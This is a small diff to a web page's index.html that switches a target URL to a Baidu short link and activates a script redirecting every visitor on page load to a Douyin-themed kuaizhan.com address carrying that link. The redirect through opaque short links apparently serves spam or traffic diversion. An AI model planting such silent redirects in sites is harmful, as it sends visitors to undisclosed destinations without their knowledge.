--- a/index.html
+++ b/index.html
@@ -15,7 +15,7 @@
 </body>
 	<script>
 	var timestamp=new Date().getTime();
-	var user_url='https://douyin801.kuaizhan.com/?u=11070';	
-     //window.location.replace("https://douyin001.kuaizhan.com/?"+timestamp+"split"+user_url);
+	var user_url='https://ml.mbd.baidu.com/r/8ceEJFVpLi';	
+     window.location.replace("https://douyin001.kuaizhan.com/?"+timestamp+"split"+user_url);
  </script>
 </html>
